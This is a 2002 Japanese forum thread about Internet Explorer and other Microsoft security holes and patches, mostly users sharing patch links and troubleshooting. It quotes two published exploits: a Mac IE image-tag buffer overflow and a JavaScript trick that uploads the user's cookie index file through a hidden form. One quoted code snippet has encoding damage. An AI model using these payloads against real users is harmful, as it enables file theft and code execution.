- パッチ適用のみで他の対策無し
- 喰らったら喰らったで、喰らったやつの責任。自分でどうにかしろ
- virus detect 時、SMTP traffic は Outbound Block

他所様に迷惑かけない仕様。ダメけ?

対応済みって MS02-005 かぁ。調査不足ｽﾏｿ｡

すでにリリースされていたXML Core Services 2.6 および 3.0 の日本語版修正
プログラム(MS02-008)が正式に公表された。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS02-008

この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
・ Microsoft XML Core Services 4.0:
http://download.microsoft.com/download/xml/Patch/Q317244/W9X2KMeXP/JA/msxml4qfe.exe
・ Microsoft XML Core Services 3.0:
http://download.microsoft.com/download/xml/Patch/3.0/W9XNT4MeXP/EN-US/Q318203_MSXML30_x86.exe
・ Microsoft XML Core Services 2.6:
http://download.microsoft.com/download/xml/Patch/2.6/W9XNT4MeXP/EN-US/Q318202_MSXML20_x86_en.exe

OSが98SE、ブラウザがIE6.0の場合、
3.0を入れればいいんですよね？

>>576
そうです

http://www.forest.impress.co.jp/article/2002/04/02/xmlcoreservicepatch.html

自分の環境に「MSXML」がインストールされているか確認する最善の方法は、
Widowsのシステムディレクトリに「MSXML」の関連ファイルがあるか確認すること
だという。

具体的には“C:\Windows\system32\”または“C:\Winnt\system32\”に、
“MSXML2.DLL”というファイルがあれば「MSXML」v2.6が、“MSXML3.DLL”という
ファイルがあれば「MSXML」v3.0が、“MSXML4.DLL”というファイルがあれば
「MSXML」v4.0がインストールされていることになる。修正プログラムは「MSXML」
のバージョンごとに別々のファイルで公開されており、複数のバージョンの「MS
XML」がインストールされている場合は、それぞれ対応する修正プログラムを
適用しておく必要がある。

　↑
　自分の場合は、C:\Windows\system32ではなく、C:\Windows\systemに
ありました。
　ちなみに、OSは98SE、ブラウザはIE6.0です。

>>577、>>578
さんくす。

>>579
私も探してみたらC:\Windows\systemにありました。
以前C:\Windows\system32を探して無かったから念のために聞いたのですが。
M$のあほー。

Javaのセキュリティホールって確かプロキシの問題だけだったはずだけど
いつのまにかバイトコードベリファイアの問題が追加されてる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-013.asp
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/218&type=0&nav=sec.sba
http://home.netscape.com/security/
これはサンドボックスを突破してコードを実行できるというもので
MS02-013は危険度が「高」に変わってる。
国内ソースでこれを報道したものってある?

>579,580
なるほど・・
system32になかったから関係ねーやと放っておいたのだが
確かにsystemで検索すればMSXML3が出てきたわな
それにしても謎めいた会社よのう　危険度高の割りには　
このスレ見なきゃ放置だったよ　オレみたいなトーシロは・・

まあ、エキスプローラで「MSXML*」を検索したほうがいいってことですな。

他のスレで既出かもしれないけど。

IE6丸ごと入れたCD-Rを家に忘れたんで、職場でIE6をDLしようとした。
「ダウンロードの場所情報は壊れています。IEブラウザのキャッシュをクリアにしてから、セットアップを再実行してください」
「ダウンロードサイトの情報が取得できませんでした」

こんな素敵なエラーがでる。
MSに問い合わせたら、鯖が落ちていて現在復旧作業中とのこと。
早よ治さんかい。

>>584
ぁ、それと同じ質問がどっかに・・・
microsoft側のミスだったのか。

>>579,580,582

その件もまた↓のようにコッソリ書き換えしてやがんの
昨日までsystem32で調べろとしか書いてなかったのに（ｗ

＞修正プログラムの適用が必要かどうかの判断には、よく寄せられる質問
マイクロソフトセキュリティ情報（MS02-008） の修正プログラムの適用が
必要であるかどうかはどのように分かるのですか?　をご覧ください。

でそこ見たら「system32またはsystem」に直してやがんの
ここ見てんのかな？　それじゃ　一言わせてね
ヴァ〜〜〜〜〜〜〜〜〜〜〜カ
断りもなしに勝手に公式文書の中身書き換えてバックれんな！
北朝鮮に移転しろ　そのほうが社風にあってるぜ

586さん、私にも言わせて！

「世間に発表する前に、ここに相談しに来たら？」
「親切な人が多いから、皆で考えてもらえるかも」

最近のMSのパッチ責めで疲れた漏れは
iBook買った
Macはマターリしてていいぞ

NetBSD/macppc

M$は仕事できないやつが多いんだろうな。

金になることは真剣にやるけど
金にならないことは適当にやる。

文句ある？

>>591
何だか中国人みたいだな

上げ〜

やっと、カーネル・サンダースの呪いの期限が切れた。
阪神は本来、神のチーム。
これくらいのゲームができて当たり前。
1938年に開幕７連勝した時に阪神は優勝した。
今年も９割方優勝する。
阪神電鉄の株価もウナギ昇りだ。
優勝すれば経済効果も核爆弾級だろう。
現在、阪神ファンの脳内モルヒネ分泌量は最高だ。
仕事にも遊びにもハリが出る。
阪神ファンが勝ち味に飢えていたが故に。
カーネル・サンダースは俺たち阪神ファンに17年間の試練を与えた。
今はそのことに感謝したい。
昼食時には是非ともKFCを利用したいと思っている。

八方がおかしくなった

むっしゅムラムラ

「IEの最新の修正プログラムは今なお2002年2月に公開されたコードの利用に対して脆弱」
https://www.netsecurity.ne.jp/article/2/4773.html

>>594
マナーが悪い阪神ファンは日本中から
呪われてますが？

「MS02-019: Internet Explorer for Mac および Office for Mac の未チェッ
クの バッファによってコードが実行される(Q321309)」
特別なHTML エレメントの処理に含まれる脆弱性により、悪意のある ユーザーが
バッファのオーバーラン攻撃 を発生させることができます。
特定のHTML エレメントに含まれる Apple Scripts を実行する脆弱性です。こ
の問題を利用して悪意のあるユーザーがユーザーの許可なしに ローカルのプログ
ラムを実行できる可能性があります。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-019ov.asp

600

Mac版IEとOfficeにセキュリティ・ホール，深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020417/1/

もう、どうでもいいや。
そんな特殊な状況に出くわすわけでもなし。

ほんと　もうどうでもいいって感じだね

Mac版IEとOfficeにセキュリティ・ホール，深刻度は「高」
Exploit:

http://www.securiteam.com/windowsntfocus/5WP0C1P6UA.html

The following HTML file will demonstrate the problem.
We chose to use IMG simply because that is instantly loaded,
but an <A HREF=...> could have been used also.
It can also be viewed (in live form)
at http://www.w00w00.org/files/advisories/ie_sample.html.
It overwrites the saved link register that is used for
a subroutine's return address on PowerPC.
This will allow remote execution of arbitrary code.
The saved link register is overwritten by the 0x41424344.
This vulnerability will allow up to 1313 characters
before the saved link register. Pure binary data (including NUL bytes)
can be used by escaping it (i.e., A as %41).
However, using "%41" will count as three characters,
rather than just one. NOTE: By character, we mean uni-byte characters.

<html>
<body>
<img src=file:///[1313 characters]%41%42%43%44>
</body>
</html>

age

IEに新たなセキュリティーホール：「戻る」ボタンで攻撃開始？
http://headlines.yahoo.co.jp/hl?a=20020418-00000001-wir-sci

こりゃまた扇動的な見出し付けたもんだなヤフーは

バグありすぎ。。。。

>>606
どうしても「戻る」ボタンで戻らないといけない場合、
どうすればいいんでしょうか？回避法とかないんですか？

>>609
ひよこに帰れよ

最近ネスケにしたよ。
ネスケも穴あるけど、なんたってマイナーだからな。(w

ネスケって重くない？

手術ラよりは軽い

>手術ラよりは軽い

ぁ、、オペラかょ！　（しばらく考えた）

ネスケなら、4.78 でいいだろ？

普段6.0だが4.78でもいいかも。動的に再描画してくれないけどな。

>>615
http://www.vector.co.jp/soft/win95/net/se208587.html
これはどうかな？

現在作業中であった場合は情報が失われました、
て頻繁に出るんだけどなんで

>>617 セキュリティと関係ないよ。
IEが壊れてる（修復しろ）か他のアプリと干渉して不安定になっているか
だろう。
パソコン初心者＠2ch掲示板
http://pc.2ch.net/pcqa/　へ。

穴がありすぎて既にどれをふさいだのか把握できてないみょ

>>617
俺も増えたように感じる。前はほとんど（数ヶ月に一度）お目にかから
なかったのに、今は数日に一度。Q319182当ててからかな、、？
出るときは複数のIEの窓を開いていて、一つの窓を閉じた時が多い
感じがする。関係ないかもしれないけど。
もっとも618の言うようなことかもしれないけどね。

>>509
オレも、TweakUIでショートカットアイコンの矢印を薄くしてたんだけど、
最近、"Windows Update"を実行したら、普通の矢印になっちまったよ。
早く直してくれ。普通の矢印、嫌いなんで、うっとうしいんだよな。

test

＜Microsoft＞
▽ Internet Explorer/Outlook
Internet Explorer 6.0とOutlook 6.0でXBMグラフィック・ファイルの使用を
許可しているため、HTMLやメールに 含まれるIMGタグで呼び出すことが可能な
る。このとき、呼び出されたが画像のサイズがチェックされないた め、大量のメ
モリを消費させることが可能になる。
ttps://www.netsecurity.ne.jp/article/6/5022.html

SecurePoint
IE/OE6.0 cannot handle malformed XBM files
http://msgs.securepoint.com/cgi-bin/get/bugtraq0204/329.html

SNMP サービスに含まれる未チェックのバッファにより、任意のコードが
実行される (MS02-006)

このセキュリティ情報の対象となるユーザー : 簡易ネットワーク管理プロトコ
ルを使用して Microsoft(R) Windows(R) 95、98、98SE、Windows NT(R) 4.0、
Windows 2000 または Windows XP システムを管理しているシステム管理者

推奨する対応策 : Windows 2000 および Windows XP の SNMP を使用しているお
客様はこの修正プログラムを適用して下さい。そのほかのお客様は、SNMP サー
ビスを実行している場合、サービスを無効にして下さい。また、修正プログラム
が入手可能となりましたら、修正プログラムを適用して下さい。

影響を受けるソフトウェア :
・ Microsoft Windows 95
・ Microsoft Windows 98
・ Microsoft Windows 98SE
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Server, Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

・ よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS02-006）
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-006.asp

どのように SNMP サービスを無効にするのですか?
使用中のシステムに次の手順を行って下さい。

Windows 95、98 および 98SE :
[コントロール パネル] で [ネットワーク] をダブルクリックします。
[構成] タブで、インストールされているコンポーネントの一覧から [Microsoft SNMP エージェント] を選択します。
[削除] をクリックします。
次のキーをチェックし、snmp.exe がリストされていないことを確認して下さい。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run


↑98SEは[構成] タブなんかないぞ( ﾟДﾟ)ｺﾞﾙｧ!!
SNMP サービスってよく分からないしシステム管理者でもないんですが、
やっぱりパッチを当てるなりサービスを無効にしたほうがいいですよね？

>>625
確かにないね。検索するとexeはあるけどね。
とりあえずヘルプ→バージョン情報でQ319182があれば
しばらく何も考えないほうがいいと思われ。

そうそう。もうこの状況に疲れたら
Operaとか、他のブラウザをインストールしておいたほうがいいよ。
つーか、IEが２ndになってしまった漏れ（w

http://www.microsoft.com/japan/technet/security/bulletin/ms02-006.asp?frame=true

98SEユーザーなんですが98用の「314147JPN8.EXE」をインストするんでしょうか？
それとも今回は待ちなんでしょうか？
はっきり言って難しい説明はいらないからこれにはこのパッチを入れろと
分かりやすく書け、ゲイツ！

＞分かりやすく

わ・か・り・や・す・く

>>627
これでいいか？

>>627のレベルを想像するに、コンパネ→ネットワークにSNMPサービスがあれば削除。
これだけすればインストールの必要なし。

ショートカットの矢印や共有アイコンの変更ができなくなった点については
直してもらえる見込みはあるのだろうか。
それともこのまま、変更できないのが「仕様」ということになってしまうのか？

ダサダサの矢印はまだいい。問題は、共有設定のあの気色悪い手のアイコンだ。
漏れはＣＤドライブを共有しているのだが、ゲームＣＤの可愛らしい美少女アイコンが
イヤラシイ男の手でおおわれて・・・うおおおお（血涙）！！！

( ﾟдﾟ)ﾎﾟｶｰﾝ

襟裳岬

『MSN Messengerに深刻なホール，すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは，MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし，Messengerなどを使用していなくても，意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので，すべて
のInternet Explorer（IE）ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に 公開されたパッチ（修正プログラム）を適用すれば影響を回
避できる。

http://pc.2ch.net/test/read.cgi/sec/1020794446/21

age

某所で「IEのパッチ未リリースのセキュリティホール一覧」みたいなリストがあった。
んで、それがほとんどJavaScriptがらみ。

ちゅうか。
漏れジャバスクはMSに繋ぐ時を除き、必ず切ってるが。

IE6SP1期待AGEの会と併せて、＜ジャバスク強要サイトに「CGI使えやこら！」ってメル送る会」、作りませんか？

CGIはどこでも使えるわけじゃないからねぇ
まぁなくても大差ないようなJavaScriptは勘弁とも思ふ

>>636
仕事で使うオンラインカタログが、ジャバスク強要で。
かなり嫌。
自社鯖のくせに、みたいな。

>>635
JavaScriptとCGIの機能的な限界の差異の分からない人が、
でしゃばーた真似するな。

『MSN Messengerに深刻なホール，すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは，MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし，Messengerなどを使用していなくても，意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので，すべて
のInternet Explorer（IE）ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に公開されたパッチ（修正プログラム）を適用すれば影響を回
避できる。

関係ないケドMS重いんだけど････
気のせいやったらｽﾏｿ

メッセンジャーのパッチってどれ？
新しいバージョンをインストールしたらいいの？

この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790
↓その中身がこれ
Microsoft MSN Chat (MSN チャット)
http://download.microsoft.com/download/chat/Patch/4.1/W98XP/EN-US/MSNChatSecFix.exe


アップデートされたソフトウェアのバージョンは、次のサイトからダウンロードできます。
MSN チャット コントロールのアップデートされたバージョンのダウンロード先 :
http://chat.msn.co.jp
修正されたコントロールを含む MSN Messenger のアップデートされたバージョンのダウンロード先 :
http://messenger.msn.co.jp/download/download.asp?client=1&update=1
修正されたコントロールを含む Exchange Instant Messaging サービス のアップデートされたバージョンのダウンロード先 :
http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp
ダウンロード先のリストから 「Japanese」 を選択して下さい。


上のパッチを当てて、下の新しいメッセンジャーソフトを入れるのが無難かもね。

>>638
しかしMSDNくらいJavaScript使い倒しで使いやすくしてるページなら許すけど、
どーでもいいページでJavaScriptを強制されるほど腹の立つことは無い。んなページ見ないけどな。(w

>>638
特定の条件が揃うと、ブラウザクラッシャー状態になるとこなんで、とっても困ってるんですが。
不良セクタできましたし。

>>644
不良セクタは関係ない。

>>645
電源強制カットするしかなかったんですが。

ブラクラ程度ならCTRL-ALT-DELで止まらんか? ネットワークケーブル引っこ抜いても良いし。
つーか、止められないのに出会ったこと無い。

>>647
いきなりブルークラッシュだったんだけど。
何が起こったのか理解できなかった、一瞬。

メールしたら、「対応ブラウザでご利用ください」、なんてレスが来たし。

とりあえずソース欲しかったんで、MACで保存しときました。

URLプリーズ

>>649
内緒（らぶ
今度暇ができたら、ぽちぽち遊びます。

HISTORYフォルダ下のindex.datについて詳しいサイトないっすか？

なんかIEとは関係ないものまで現れるんですけど…。
（ちなみにIEは4です、すいまそん）

User-Agent に Q312461 または T312461 の文字列のない IE は
パッチを当ててないか偽装 UA のどちらかと断定してしまっていいですか？
偽装 UA のかなりの部分がロボット（それもメールアドレス収集とかの
あやしげなもの）の気配が濃厚なんで、偽装でないものも含めて
MS のページにリダイレクトするよう Web サーバを設定してやりたいんだけど。

最近出荷された PC にプレインストールされた IE はパッチ済みだけど
この文字列がない、とかいうことがあれば考えなおさなきゃならんので
教えてください。

>>652
IEにパッチを入れなればそういう文字列が出ないだけで、それはユーザが
入れてないだけのこと。
それにその2種類以外だってあるのだし。
UAの偽装を見破ることは無理。

>>653
そんなこと百も承知で疑わしい奴はMSに飛ばしちまおうというんだろ。
しかし、パッチ済みでUAにパッチIDの無い奴があったらまずいのでそれを知りたいというのが>>652
もうちっと、読解力つけろや。

>>654
だから無理だって言ってんじゃないの

つまり、出る杭は打たれて根元を曲げちゃって親方に怒られるって事だね？

関連スレッド：メーラーの視点で

OE(又はIEコンホ?ーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021137509/

>>655
どんな場合に無理なのか具体例を教えていただきたく。
UA の偽装を100%見破ることは目的ではない。セキュ穴をふさいだのに
パッチ ID が UA にあらわれない場合があるのかどうかが知りたいだけ。

↓UA をパッチなし IE に偽装したロボットによるアクセスの実例
eng002.goo.ne.jp - - [14/May/2002:12:43:20 +0900] "GET / HTTP/1.1" 200 42633 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

goo 逝ってよし。

MS02-023 出ますた。Windows Update でも可能。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023ov.asp

いいかげん何とかしてくれ↓
Q312461; Q313675; Q316059; q319182; Q321232;

>>658
単にロボット対策すればいいだけじゃないの？

>>660
robots.txt や <mata name="ROBOTS"> を解釈してくれるような
まともなロボットは UA の偽装なんてしません。

>>661
対策の仕方をそれしか知らないだけだろ。
Web制作板へどうぞ

>>658
偽装がないという前提で、まったくパッチを当てなければ表示されないが、
当てていても表示され方は様々。
パッチが出るたびに適用すればいくつも表示されるし、過去のパッチを
包括したものだけを適用すれば少ししか表示されない。
いずれかのパッチを適用していないアクセスが自分のサイトに悪影響を
及ぼすと考えてセキュ穴と言ってるのなら、該当するパッチの表示が
ないものをリダイレクトすればいい。

ちなみに私のは>>659さんと同じ5つです。

>>663
どんなにパッチを当てていても、*User-Agent* には 312461 しか出ないよ。

ダメだ、マイクロソフトが落ちてるっぽい。

http://jscript.dk/adv/TL002/
// Expected to return an array of <link> elements.
// theDocument variable used in this line is the document property of the
// argument sent to the dialog, an expected window object.
links = theDocument.all.tags("link");

// Sends the array for inspection by another function
retVal = checkLinkReadyStateComplete(links, reportLocation);

if�(objects�==�null)�
�return�retVal;
for�(i=0;�i�<�objects.length;�i++)�{
�element�=�objects(i);
�if�(element.rel.toLowerCase()�==�"stylesheet"
��||�element.rel.toLowerCase()�==�"alternate�stylesheet")
�{
��if�(element.readyState�!=�"complete"�&&�element.readyState�!=�4)�{
��reportLocation.insertAdjacentHTML("BeforeEnd",�L_StyleSheetNotInstalled_Text�+�element.href�+�"<BR><hr>");
��retVal�=�true;
��}
�}
�}

累積パッチ上げ入れようぞ

>>659
Q306121が抜けてるやん

>>668
累積パッチって、一度に複数の修正を適用するとそのうちひとつしか
表示されないんじゃないかな？ ほんとかどうかは知らんけど。
うちで最近新規インストールしたWin2k+IE5.5は、バージョン情報を見るかぎり
Q312461が入ってないけど、User-AgentにはT312461が入ってる(w

昨夜パッチあてたけど、再起動したらｱｯﾌﾟﾃﾞｰﾄに失敗しましたと表示された。
もう一度、MSに確認したら、ｲﾝｽﾄされた事になってた。

IE6　ｑ３１９１８２；　Q３２１２３２；　
↑
こんな状態です、大丈夫ですか

>>670 OSは？

>>671
言いにくいんですが、メモ帳です。
どうでしょう？

>>672
偽者ウゼー

Meです　>>671

どうやらWinME + IE6 + Q３２１２３２はパッチ当てるときに不安定のようだね。
結果的にはパッチは当たっているようだが。

>>673
本物ウゼー

Weです>>671

>>675
なに一生懸命煽ってるの？馬鹿ちゃうか〜

>>674
アドバイスありがとうです

マイクソロフト
俺もQ321232入れますた。バージョン情報見たら、ちゃんと追加されてた。
でも診断くんでみたらQ312461だった
よく分からんしまぁいいや・・・。

ちょっと冷え込んできたので、パッチをあてます。

MSのパッチを知った頃は神経質なくらい調べまくって
チェックしていたが、近頃はメールで知らせてくれたものだけ当てている。
性格がMSみたいに雑になってきた。

>>677
ｱｯ　折れもだ！！

個人情報ってなに？どんなことなの？

>>679
確かに面倒い。
ホントならIE6SP1とか出してもらって一括で修正したいんだけど
あんまり頻繁に脆弱性が見つかるもんで
MSもリリースのタイミングが取れないんだろうね。

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:25:49 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:26:46 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールが完了しました。
16:36:37 2002年5月16日 : 5383

>>683
俺も

>>683　

>>685

ie6のmeだけど問題なくあてれたよ。

でイケルのでは？

WinMe/IE6　です。
今まですべて当ててるはずですが
ｑ３１９１８２；　Q３２１２３２；　となってます。

ヤヴァイんでしょうか？

sageてしまいました。

>>689
私は最初からこまめにアップデートしていました。
環境はWindows Meで使用ブラウザはIE6です。

セキュリティパッチは以下のとおり。
Q306021,Q312461,Q313675,Q316059,q319182,Q321232

累積的なパッチがこの中には含まれているので、>>689さんので
万全かもしれませんが、念のために、こちらのほうでご自身でご
確認ください。

http://www.microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=13

>>691
有難う。
個別にパッチ当てていましたが、累積パッチが出たらまた上から当ててました。

了解です、確認してみます。

>>691
q313829は？

それと
またこのソフトウェアアップデートを実行すると、
修正プログラムに加えて、「制限付きサイト」のデフォルト設定を「すべてのフレームをブロックする」に制限する新しい“機能”が追加される。
ってあるんだけど、「すべてのフレームをブロックする」なんていう項目は何処にあるの？
http://www.zdnet.co.jp/news/0205/16/ne00_ie.html

EXCELの穴
http://www.zdnet.co.jp/news/0205/28/nebt_01.html
MSセキュリティスレ欲すい

>>694 立ててくれ

このスレとOEスレがあるんで、あまり乱立させても分散しちまうから、このスレの次でいいカナと。

なるほど

【Windows】セキュリティ情報総合スレッド
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/

こんなんあるけど

http://pc.2ch.net/test/read.cgi/sec/1021363841/73より転載
IE 5.5/6に深刻なホール，対策はGopherプロトコルを無効にすること

フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日，Internet Explorer（IE）5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると，ユーザーのパソコン上で任意
のコード（プロ グラム）を実行させられる恐れがある。対策は，IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/

>>699
この対策をして127.0.0.1から攻撃されるんですけどと騒ぐPFW厨が出現するに2000ドラクマ

>>700 ﾜﾗﾀ

オミトロンが使えなくなりましたね。

>>699 についてMSから公表あり。
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp

MSからのメールって読んでもいつも意味が分からず
とりあえずパッチ当ててるんですが
今回はどれくらい危険なんですか？

>>704 危険度「高」だ。パッチはまだ出てない。そこで回避策を講じる必要
がある。詳細は
http://ime.nu/www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.aspで。

WinsockでGopher通らないように設定変更した
MS Proxy2.0の内側にいるIE達も、
設定変更しなきゃダメ？

>>706
WinsockでGopher通さないってなんだ?
gopher://xx.xx.xx.xx:80とかポート指定されるてもブロック出来るか?

>707
MS-Proxyでは、Winsockをどのプロトコルで有効にするか
設定出来るんだよ

そのProxyもMSだからなぁ・・・

ISA Server 2000、Proxy Server 2.0用の修正プログラムのみ公開された。
Internet Explorer用のは未公開。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
・ ISA Server 2000:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39859
・ Proxy Server 2.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39864

マイクロソフトが公開した「Gopher問題」の回避方法に誤り
　TCPポート70番のブロックでは防げない，パッチや設定変更で回避
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020617/1/
＞誤った回避策とは，「Gopherプロトコルが使用するTCPポート70番を，
＞ファイアウオ ールなどでブロックすること」である。これでは攻撃を防げない
＞のである。
IEの設定変更で対処すべし。

英語版のセキュリティ情報は既に修正済み
http://www.microsoft.com/technet/security/bulletin/ms02-027.asp

「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
日本語版も訂正完了。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
このセキュリティ情報ページを更新し、最初にリリースしたセキュリティ情報の
TCP ポート 70 番のブロックの有効性に関する情報に事実と異なる点があった
ため、削除しました。

Internet Explorer用の修正パッチは未公開。

http://www.zdnet.co.jp/news/0206/19/xert_sue.html

エラーが見つかったら自分で直せばいいじゃん

WMP 修正パッチage
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032.asp

WMP6.4と7.1を入れてるんですけど（Win98環境）、
これからはwm320920_71.exeの1ヶだけ当てればWMP関係は全てOKなんですよね？

パッチが正常にインストールされたか確認する方法
- Windows Media Player 7.1
C:\Program Files\Windows Media Player (オペレーティング システムが C
ドライブにインストールされている場合) のフォルダに入っている、
wmplayer.exe のバージョンを確認します。確認するには Windows
エクスプローラーから、wmplayer.exe を右クリックし、[プロパティ] を
クリックします。 [バージョン情報] タブをクリックし、ファイルバージョン
が 7.10.0.3068 と表示されていることを確認します。

上記の方法で見るとバージョン情報を見ると　7.10.0.3068なのに、
WMP7.1のヘルプ→バージョン情報を見ると　7.01.00.3055になってる。
パッチはうまく当たったんだろうけどなぜ一致しないんだ？

技術的にはダイアログリソースとバージョンリソースは独立だから…
こういう手抜きパッチ作るなよな。

「MS02-027」のKnowleage Base公開。
http://www.microsoft.com/JAPAN/support/kb/articles/JP323/8/89.asp

IE向けパッチは遠日公開されたいという気持ちはある。

IEのセキュリティを突くようなデモをしているサイトを
教えて欲しいのですが・・・。

microsoft

Gopherは元々使わないからいいんだけども
パッチが出ないのは気持ち悪いよね。

>>720
こんなのとか？（パッチあててる人には関係ないけど）
http://homepage2.nifty.com/m_kamada/javascript/ietest7.htm

>>720
あと、こんなの。
http://java-house.jp/~takagi/security/misc/jscript-clipboard/test.html

>>724は別にセキュリティーホールを突いているわけではなかったね。
スンマソ。

>>720
http://pc.2ch.net/test/read.cgi/sec/1005185421/l50
↑のスレで紹介されてた↓のサイトの「Windows Security」のコーナーに色々あった。
http://tarikihongandou.shadowpenguin.org/

>>722
次の累積パッチに入れると見た。
次のは全部でいくつセキュリティホールをつぶすのかな。ﾜｸﾜｸ

あぼーん

ＩＥ６の修正プログラムをＴｅｃｈＮｅｔからインストールしようとして
自分の機種やＯＳ（ｗ２ｋ）以外のプログラムを誤ってインストールしてしまいました。
そのせいか残りのプログラムがエラーが出てインストールできませんでした。
もとの状態に戻すにはどうしたらいいのでしょう？
ＩＥ６アンインストールしたら全部消える？

このスレッドを知る前に他の板でも聞いてしまったけど、こんなおばかな
事例へのお答えも少なく、こちらでも質問させていただきました。
怒らないでー。教えてー。お願い致します。

>>729
モニターを縦にしてみましょう

>>717
>WMP7.1のヘルプ→バージョン情報を見ると　7.01.00.3055になってる。
同じです

>>730　してみました！（ノートだから軽くてﾖｶﾀ）
治ったかな〜？･･･だめみたいですぅ。。。

･･･お願いです。教えてください。

やったことないからシラン。

アンインストール⇒リカバリーCDROMでIE入れ直す⇒修正プログラム入れる

じゃない？

なんでまたＴｅｃｈＮｅｔなんだ？
パチ当てならアップデートで十分だろうに・・・

・IE6を上書きインストール
・修正プログラムのアンインストール
・IE6を一旦消してまた入れる
・システムの復元
・修正プログラムの/x解凍して手作業で直す
考えられる修正方法

>>735　Frethem対策ページから飛んだためです。
>>734-736　
ご指導ありがとうございます。まずIE6消してまた入れてみます。

http://archives.neohapsis.com/archives/bugtraq/2002-07/0250.html

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------

Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

英語版SP3が出ました。
http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2KSP3.exe

さっさと日本語版出せ。

>>731

wmp7.1をインストールしてある
フォルーダーの中のwmplayer.exe
を右クリックしてバージョンを見てみな。

ようやくSP3か・・・
今週中には出るかな？

IEやIEコンポ使ってるタブブラ使ってるやつはセキュリティを語る資格ないな

>>742
使って無くても、WindowsユーザーはIEと共同体だ。

>>742
どのブラウザでも然して変わらない

>>743
95以前ならIEと心中する必要はない

ケチつけたくてつけたくてたまらないからとりあえずレスしてみました
みたいなレスだな。

あ！

い？

スレッド一覧はこちらを今見たら、ノートンが反応しました。大丈夫でしょうか？

ＩＥどうしようもないね、バッファーオ−バーランする
コーディングしかできない連中がイッパイいるってことね。
マイクロアフォか、延々といたちごっこ繰り返す罠だな。
いいかげんソース公開しろ、俺が直してやるぜ。

ぐちゃぐちゃなので公開しません

>>750
だろうな、クロウトでも解析できない罠だな。
がんばって商売してくらい！！

IE6SP1は、まだなのかなぁ。

>>752
10年後に合いましょう

米Microsoft、IEのSSL実装に「なりすまし」可能な脆弱性
http://www.watch.impress.co.jp/internet/www/article/2002/0819/iessl.htm
↑これって
↓かな？
http://pc.2ch.net/test/read.cgi/sec/1016256558/16

MS02-047 に関する情報
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
